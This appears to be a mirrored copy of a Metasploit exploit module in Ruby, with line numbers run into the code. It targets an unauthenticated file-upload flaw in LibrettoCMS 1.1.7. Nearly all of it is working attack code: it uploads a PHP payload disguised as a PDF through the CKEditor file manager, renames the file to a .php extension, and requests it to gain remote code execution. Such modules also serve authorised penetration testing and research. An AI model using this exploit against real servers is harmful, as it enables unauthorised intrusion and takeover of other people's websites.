CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/webapp/libretto_upload_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info={})12super(update_info(info,13'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",14'Description' => %q{15This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and16possibly prior. Attackers can bypass the file extension check and abuse the upload17feature in order to upload a malicious PHP file without authentication, which18results in arbitrary remote code execution.19},20'License' => MSF_LICENSE,21'Author' =>22[23'CWH',24'sinn3r' #Metasploit25],26'References' =>27[28['OSVDB', '94391'],29['EDB', '26213']30],31'Payload' =>32{33'BadChars' => "\x00"34},35'Platform' => %w{ linux php },36'Targets' =>37[38[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],39[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]40],41'Privileged' => false,42'DisclosureDate' => '2013-06-14',43'DefaultTarget' => 0))4445register_options(46[47OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])48])49end5051def check52res = send_request_raw({'uri' => normalize_uri(target_uri.path)})53if not res54vprint_error("Connection timed out")55return Exploit::CheckCode::Unknown56end5758if res.body =~ /Powered by <a href=".+">Libretto CMS/59return Exploit::CheckCode::Detected60end6162Exploit::CheckCode::Safe63end646566def upload(base)67p = get_write_exec_payload(:unlink_self=>true)68fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"6970data = Rex::MIME::Message.new71data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")72data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")73data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')74post_data = data.to_s7576uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')7778res = send_request_cgi({79'method' => 'POST',80'uri' => uri,81'ctype' => "multipart/form-data; boundary=#{data.bound}",82'data' => post_data,83'vars_get' => {'type'=>'all files'}84})8586if not res87fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")88elsif res.code.to_i != 20089fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")90end9192fname93end949596def rename(base, original_fname)97new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"98uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')99res = send_request_cgi({100'method' => 'POST',101'uri' => uri,102'vars_get' => { 'type' => 'all files' },103'vars_post' => {104'fun' => 'renameFile',105'dir' => '',106'filename' => original_fname,107'newFilename' => new_name108}109})110111if not res112fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")113elsif res.body !~ /"res":"OK"/114fail_with(Failure::Unknown, "#{peer} - Failed to rename file")115end116117new_name118end119120121def exec(base, payload_fname)122res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })123if res and res.code.to_i == 404124fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")125end126end127128129def exploit130base = target_uri.path131132print_status("Uploading malicious file...")133orig_fname = upload(base)134135print_status("Renaming #{orig_fname}...")136new_fname = rename(base, orig_fname)137138print_status("Executing #{new_fname}...")139exec(base, new_fname)140end141end142143144